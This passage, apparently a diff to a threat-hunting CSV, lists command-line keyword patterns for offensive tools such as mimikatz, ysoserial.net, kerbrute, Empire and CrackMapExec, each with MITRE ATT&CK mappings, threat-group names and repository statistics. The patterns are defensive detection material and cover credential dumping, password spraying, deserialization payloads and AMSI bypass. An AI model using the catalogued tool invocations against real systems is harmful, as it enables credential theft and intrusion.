T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* --outdir ldapdomaindump *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - 
T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --output rootDSEs.json --dump*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"* --output rootDSEs.json --dump*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" "* ovs-agent-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* owa * --user-as-pass *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* oxidfind -i *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* oxidfind -n *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" -"* -p * --amsi-bypass *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -p * -d *.dll -e OpenProcess*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"* -p * --amsi-bypass *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -p * -d *.dll -e 
OpenProcess*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "* -p *\mimi.out*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -p 1337:1337 -p 5000:5000*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - 
T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "* -p 4644 -n mal*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "* -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","0","blank lmhash","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" -"* -p ActivatorUrl*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* -p Altserialization*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p ActivatorUrl*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p Altserialization*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "* -p CommonsCollections1 -c whoami*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"* -p DotNetNuke*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p 
DotNetNuke*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "* -p LastLogonTimestamp -p LastLogonUserName *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* -p powershell -i *.ps1 -o *.vba*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" -"* -p SessionSecurityTokenHandler*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p SessionSecurityTokenHandler*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "* -p shellcode -i *.bin -o *.vba*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" -"* -p test_passwords.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -p TransactionManagerReenlist*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*' p::d '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"* -p test_passwords.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -p TransactionManagerReenlist*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*' p::d '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "* -p:AssemblyName=inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "* p2p-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --pacu-help*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"* --pacu-help*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "* 
papacat.ps1*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" "* parrot main *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot.run/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot-backports *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot-security *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* -PasswordList *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens 
- Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBAutoBrute.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -PasswordList *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard 
Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --password-list *","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"* --password-not-required --kdcHost *cme*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* passwordspray -d *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"* --password-not-required --kdcHost *cme*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* passwordspray -d *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "* path-mtu.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -pathToBloodHoundGraph * -pathToOutputGoFetchPath * -pathToAdditionalPayload *","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "* -PathToDMP *.dmp*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "* -PathToGraph *.json -PathToPayload *.exe*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" -"* -Payload * -method sysprep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - 